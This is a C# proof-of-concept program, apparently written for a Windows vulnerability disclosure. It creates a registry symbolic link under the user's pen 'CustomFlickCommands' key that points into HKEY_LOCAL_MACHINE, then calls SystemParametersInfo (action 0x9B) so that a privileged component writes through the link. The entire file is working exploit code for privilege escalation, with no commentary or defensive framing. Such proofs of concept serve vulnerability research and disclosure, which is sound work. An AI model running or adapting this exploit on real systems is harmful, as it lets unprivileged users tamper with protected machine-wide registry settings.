﻿using NtApiDotNet;
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace poc
{
    class Program
    {
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        class FlickInfo
        {
            public Guid guid;
            public int ModifierKeys;
            public int KeyCode;
            public int Length;
            [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)]
            public string FriendlyName;
        }

        [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        static extern bool SystemParametersInfo(int uiAction, int uiParam, [In] FlickInfo pvParam, int fWinIni);

        const string FlickKey = @"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wisp\Pen\SysEventParameters\CustomFlickCommands";
        const string TargetKey = @"HKEY_LOCAL_MACHINE\SOFTWARE\ABC";

        static NtKey CreateSymbolicLink(string name, Guid guid, string target)
        {
            name = NtKeyUtils.Win32KeyNameToNt(name);
            target = NtKeyUtils.Win32KeyNameToNt(target);

            return NtKey.CreateSymbolicLink($@"{name}\{guid:B}", null, target);
        }

        static void Main(string[] args)
        {
            try
            {
                Guid guid = Guid.NewGuid();
                using (var link = CreateSymbolicLink(FlickKey, guid, TargetKey))
                {
                    try
                    {
                        FlickInfo fi = new FlickInfo()
                        {
                            guid = guid,
                            Length = 2,
                            FriendlyName = ""
                        };
                        if (!SystemParametersInfo(0x9B, Marshal.SizeOf(fi), fi, 0))
                            throw new Win32Exception();
                    }
                    finally
                    {
                        link.Delete();
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
